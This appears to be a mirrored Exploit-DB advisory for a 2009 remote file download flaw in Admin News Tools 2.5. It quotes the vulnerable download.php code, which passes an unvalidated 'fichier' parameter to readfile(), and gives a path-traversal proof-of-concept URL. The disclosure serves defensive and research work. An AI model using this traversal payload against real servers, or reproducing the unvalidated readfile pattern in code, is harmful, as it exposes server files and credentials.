Admin News Tools Remote File Download Vulnerability

vendor:

Admin News Tools

by:

Securitylab.ir

6,4

CVSS

MEDIUM

Remote File Download Vulnerability

434

CWE

Product Name: Admin News Tools

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: NO

Related CWE: N/A

CPE: a:admin_news_tools:admin_news_tools:2.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Admin News Tools Remote File Download Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in the 'fichier' parameter of the 'download.php' script. This can be exploited to download arbitrary files from the server by passing a relative path to the file in the 'fichier' parameter.

Mitigation:

Input validation should be performed to ensure that arbitrary files are not downloaded.

Source

Exploit-DB raw data:

######################### Securitylab.ir ########################
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===========================================================
# Download.php
# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-07-15]